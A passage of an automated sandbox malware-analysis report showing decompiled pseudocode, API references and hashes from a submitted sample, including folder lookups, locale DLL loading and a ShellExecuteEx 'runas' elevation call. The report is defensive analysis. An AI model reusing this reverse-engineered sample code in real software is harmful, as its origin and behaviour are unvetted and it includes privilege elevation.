						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004077A8();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004598AC(__ebp);
							} else {
								__eax = E004598E8(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00456FEC(__eax, __ecx);
							}
							goto L102;
						case 6:
                                                                                                                                                                                                                            							__eax = _v12;
                                                                                                                                                                                                                            							 *_v12 = 0x27;
                                                                                                                                                                                                                            							__eax = E004598AC(__ebp);
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t316 = _t306 + 1;
                                                                                                                                                                                                                            					_t376 = 0;
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t166 = 0;
                                                                                                                                                                                                                            						_pop(_t366);
                                                                                                                                                                                                                            						 *[fs:eax] = _t366;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L103:
                                                                                                                                                                                                                            					return _t166;
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					_t376 = _t376 + 1;
                                                                                                                                                                                                                            					_t316 = _t316 - 1;
                                                                                                                                                                                                                            					__eflags = _t316;
                                                                                                                                                                                                                            					if(_t316 != 0) {
                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}























































                                                                                                                                                                                                                            0x00459df4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459de3
                                                                                                                                                                                                                            0x00459a72
                                                                                                                                                                                                                            0x00459a77
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa7
                                                                                                                                                                                                                            0x00459e9c
                                                                                                                                                                                                                            0x00459e9f
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459aad
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459dbf
                                                                                                                                                                                                                            0x00459dc4
                                                                                                                                                                                                                            0x00459dc6
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459a79
                                                                                                                                                                                                                            0x00459e74
                                                                                                                                                                                                                            0x00459e77
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a84
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459b1b
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00459b28
                                                                                                                                                                                                                            0x00459b16
                                                                                                                                                                                                                            0x00459b33
                                                                                                                                                                                                                            0x00459b38
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a8c
                                                                                                                                                                                                                            0x00459cc0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459cc0
                                                                                                                                                                                                                            0x00459a92
                                                                                                                                                                                                                            0x00459a97
                                                                                                                                                                                                                            0x00459fbf
                                                                                                                                                                                                                            0x00459fc4
                                                                                                                                                                                                                            0x00459fc6
                                                                                                                                                                                                                            0x00459fcd
                                                                                                                                                                                                                            0x00459fcd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a9d
                                                                                                                                                                                                                            0x00459a97
                                                                                                                                                                                                                            0x004599b7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004599bd
                                                                                                                                                                                                                            0x004599c0
                                                                                                                                                                                                                            0x00459a2c
                                                                                                                                                                                                                            0x00459a2f
                                                                                                                                                                                                                            0x00459a4e
                                                                                                                                                                                                                            0x00459a4e
                                                                                                                                                                                                                            0x00459a51
                                                                                                                                                                                                                            0x00459b9e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b9e
                                                                                                                                                                                                                            0x00459a57
                                                                                                                                                                                                                            0x00459a5a
                                                                                                                                                                                                                            0x00459ce4
                                                                                                                                                                                                                            0x00459cea
                                                                                                                                                                                                                            0x00459cf0
                                                                                                                                                                                                                            0x00459cf6
                                                                                                                                                                                                                            0x00459cf9
                                                                                                                                                                                                                            0x00459d00
                                                                                                                                                                                                                            0x00459d06
                                                                                                                                                                                                                            0x00459d09
                                                                                                                                                                                                                            0x00459d10
                                                                                                                                                                                                                            0x00459d90
                                                                                                                                                                                                                            0x00459d12
                                                                                                                                                                                                                            0x00459d21
                                                                                                                                                                                                                            0x00459d26
                                                                                                                                                                                                                            0x00459d2c
                                                                                                                                                                                                                            0x00459d2e
                                                                                                                                                                                                                            0x00459d78
                                                                                                                                                                                                                            0x00459d80
                                                                                                                                                                                                                            0x00459d30
                                                                                                                                                                                                                            0x00459d35
                                                                                                                                                                                                                            0x00459d4c
                                                                                                                                                                                                                            0x00459d4e
                                                                                                                                                                                                                            0x00459d50
                                                                                                                                                                                                                            0x00459d52
                                                                                                                                                                                                                            0x00459d5b
                                                                                                                                                                                                                            0x00459d69
                                                                                                                                                                                                                            0x00459d69
                                                                                                                                                                                                                            0x00459d52
                                                                                                                                                                                                                            0x00459d2e
                                                                                                                                                                                                                            0x00459d10
                                                                                                                                                                                                                            0x00459d00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a60
                                                                                                                                                                                                                            0x00459a5a
                                                                                                                                                                                                                            0x00459a31

Strings
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID:
• String ID: RegisterAutomation$vcltest3.dll
• API String ID: 0-2963190186
• Opcode ID: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                                                                                                                                                                                            • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81692a346c510cd3cab428a03d42892663644badc2aea56474423a5a3e502603
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                                                                            			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				struct _ITEMIDLIST* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v273;
                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                            				char _v296;
                                                                                                                                                                                                                            				char _v300;
                                                                                                                                                                                                                            				char _v304;
                                                                                                                                                                                                                            				char _v308;
                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                                                                            				int _t91;
                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                            				intOrPtr _t100;
                                                                                                                                                                                                                            				intOrPtr* _t108;
                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t91 = __edx;
                                                                                                                                                                                                                            				_t29 = __eax;
                                                                                                                                                                                                                            				_t110 = _t111;
                                                                                                                                                                                                                            				_t112 = _t111 + 0xfffffed0;
                                                                                                                                                                                                                            				_v308 = 0;
                                                                                                                                                                                                                            				_v304 = 0;
                                                                                                                                                                                                                            				_v300 = 0;
                                                                                                                                                                                                                            				_v280 = 0;
                                                                                                                                                                                                                            				_t81 = __edx;
                                                                                                                                                                                                                            				_push(_t110);
                                                                                                                                                                                                                            				_push(0x473306);
                                                                                                                                                                                                                            				_push( *[fs:ecx]);
                                                                                                                                                                                                                            				 *[fs:ecx] = _t112;
                                                                                                                                                                                                                            				_t84 = __eax;
                                                                                                                                                                                                                            				if(__eax > 6) {
                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                            					if(_t29 != 7) {
                                                                                                                                                                                                                            						SHGetSpecialFolderLocation(0, _t91,  &_v8); // executed
                                                                                                                                                                                                                            						SHGetPathFromIDList(_v8,  &_v273);
                                                                                                                                                                                                                            						E0040A174( &_v273, _t81);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(_t110);
                                                                                                                                                                                                                            						_push(0x4732a8);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t112;
                                                                                                                                                                                                                            						E00472EF0( &_v280, _t81, _t84, 0);
                                                                                                                                                                                                                            						E00404DCC(_v280, 0x47331c);
                                                                                                                                                                                                                            						if(0 == 0) {
                                                                                                                                                                                                                            							SHGetSpecialFolderLocation(0, 5,  &_v8);
                                                                                                                                                                                                                            							SHGetPathFromIDList(_v8,  &_v273);
                                                                                                                                                                                                                            							E0040A174( &_v273,  &_v300);
                                                                                                                                                                                                                            							E00409D30(_v300, _t81);
                                                                                                                                                                                                                            							E00404CCC( &_v304, "\\Downloads",  *_t81);
                                                                                                                                                                                                                            							_t59 = E00409A58(_v304);
                                                                                                                                                                                                                            							__eflags = _t59;
                                                                                                                                                                                                                            							if(_t59 == 0) {
                                                                                                                                                                                                                            								E00404CCC( &_v308, 0x473390,  *_t81);
                                                                                                                                                                                                                            								_t63 = E00409A58(_v308);
                                                                                                                                                                                                                            								__eflags = _t63;
                                                                                                                                                                                                                            								if(_t63 == 0) {
                                                                                                                                                                                                                            									E004049C0(_t81);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E00404C88(_t81, 0x473390);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E00404C88(_t81, "\\Downloads");
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
                                                                                                                                                                                                                            							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
                                                                                                                                                                                                                            							 *_t108( &_v296, 0, 0,  &_v12);
                                                                                                                                                                                                                            							E00404BE8(_t81, _v12);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_pop(_t100);
                                                                                                                                                                                                                            						 *[fs:eax] = _t100;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t93);
                                                                                                                                                                                                                            					 *[fs:eax] = _t93;
                                                                                                                                                                                                                            					_push(0x47330d);
                                                                                                                                                                                                                            					E004049E4( &_v308, 3);
                                                                                                                                                                                                                            					return E004049C0( &_v280);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
                                                                                                                                                                                                                            					case 0:
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 1:
                                                                                                                                                                                                                            						_t91 = 0x1a;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 2:
                                                                                                                                                                                                                            						__edx = 0x1c;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 3:
                                                                                                                                                                                                                            						__edx = 0x23;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 4:
                                                                                                                                                                                                                            						__edx = 0x2e;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 5:
                                                                                                                                                                                                                            						__edx = 5;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					case 6:
                                                                                                                                                                                                                            						__edx = 0;
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306), ref: 004731BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00473206
                                                                                                                                                                                                                            • SHGetPathFromIDList.SHELL32(?,?), ref: 00473216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                                                                                                                                                                                            • String ID: SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                                                                                                                                                                                            • API String ID: 2341558874-1676591009
                                                                                                                                                                                                                            • Opcode ID: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                                                                                                                                                                                            • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 346 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 347 406313-406317 346->347 348 4063f6-4063fd 346->348 349 406323-406339 lstrlen 347->349 350 406319-40631d 347->350 351 40633c-40633f 349->351 350->348 350->349 352 406341-406349 351->352 353 40634b-406353 351->353 352->353 354 40633b 352->354 353->348 355 406359-40635e 353->355 354->351 356 406360-406386 lstrcpyn LoadLibraryExA 355->356 357 406388-40638a 355->357 356->357 357->348 358 40638c-406390 357->358 358->348 359 406392-4063c2 lstrcpyn LoadLibraryExA 358->359 359->348 360 4063c4-4063f4 lstrcpyn LoadLibraryExA 359->360 360->348
                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E004062DC() {
                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                            				char* _t51;
                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t59;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0x105);
                                                                                                                                                                                                                            				_push( *((intOrPtr*)(_t61 - 4)));
                                                                                                                                                                                                                            				_push(_t61 - 0x11d);
                                                                                                                                                                                                                            				L0040131C();
                                                                                                                                                                                                                            				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                                                                                                                                                                                            				_t59 = 0;
                                                                                                                                                                                                                            				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					return _t59;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t28 = _t61 - 0x11d;
                                                                                                                                                                                                                            					_push(_t28);
                                                                                                                                                                                                                            					L00401324();
                                                                                                                                                                                                                            					_t51 = _t28 + _t61 - 0x11d;
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                                                                                                                                                                                            						_t51 = _t51 - 1;
                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 = _t61 - 0x11d;
                                                                                                                                                                                                                            					if(_t51 != _t30) {
                                                                                                                                                                                                                            						_t52 = _t51 + 1;
                                                                                                                                                                                                                            						if( *((char*)(_t61 - 0x12)) != 0) {
                                                                                                                                                                                                                            							_push(0x105 - _t52 - _t30);
                                                                                                                                                                                                                            							_push(_t61 - 0x12);
                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                            							L0040131C();
                                                                                                                                                                                                                            							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                                                                                                                                                                                            							_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                                                                                                                                                            							_push(_t61 - 0xd);
                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                            							L0040131C();
                                                                                                                                                                                                                            							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                                                                                                                                                            							_t59 = _t36;
                                                                                                                                                                                                                            							if(_t59 == 0) {
                                                                                                                                                                                                                            								 *((char*)(_t61 - 0xb)) = 0;
                                                                                                                                                                                                                            								_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                                                                                                                                                            								_push(_t61 - 0xd);
                                                                                                                                                                                                                            								_push(_t52);
                                                                                                                                                                                                                            								L0040131C();
                                                                                                                                                                                                                            								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                                                                                                                                                            								_t59 = _t42;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                            • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00473490(intOrPtr __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __eflags, char _a4, char _a8) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				char* _t33;
                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t43 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t56);
                                                                                                                                                                                                                            				_push(0x473564);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t56 + 0xffffffbc;
                                                                                                                                                                                                                            				E004032B4( &_v72, 0x3c);
                                                                                                                                                                                                                            				_v72 = 0x3c;
                                                                                                                                                                                                                            				_v64 = _t43;
                                                                                                                                                                                                                            				_v68 = 0x440;
                                                                                                                                                                                                                            				_v56 = E00404E80(_v8);
                                                                                                                                                                                                                            				if(_a8 != 0) {
                                                                                                                                                                                                                            					_v60 = 0x473574;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                            					_v52 = E00404E80(_v12);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v44 = 1;
                                                                                                                                                                                                                            				_t33 =  &_v72;
                                                                                                                                                                                                                            				_push(_t33); // executed
                                                                                                                                                                                                                            				L0042EC28(); // executed
                                                                                                                                                                                                                            				if(_t33 != 0) {
                                                                                                                                                                                                                            					if(_a4 != 0 && _v16 != 0) {
                                                                                                                                                                                                                            						while(WaitForSingleObject(_v16, 0x32) == 0x102) {
                                                                                                                                                                                                                            							Sleep(0x32);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t52);
                                                                                                                                                                                                                            				 *[fs:eax] = _t52;
                                                                                                                                                                                                                            				_push(0x47356b);
                                                                                                                                                                                                                            				return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                                                            • Sleep.KERNEL32(00000032,00000000,00000032,00000000,00473564), ref: 0047352B
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExecuteObjectShellSingleSleepWait
                                                                                                                                                                                                                            • String ID: <$runas
                                                                                                                                                                                                                            • API String ID: 3175876650-1187129395
                                                                                                                                                                                                                            • Opcode ID: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                                                                                                                                                                                            • Instruction ID: 5aa402594196cc22e358d2c9fc2044dae5621586ffdb0388778a4eaf1ff726ef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2f4098c0599bc8fe6b33f95c7c42db526a5f4d83c62203c5c16265f54e5b256
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC217FB0904208BBDB15DFAAD486BDEBBB8EB04304F50807BF508A6291D77C9B45DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099E0(void* __eax) {
                                                                                                                                                                                                                            				short _v6;
                                                                                                                                                                                                                            				short _v8;
                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
                                                                                                                                                                                                                            				if(_t16 == 0xffffffff) {
                                                                                                                                                                                                                            					L3:
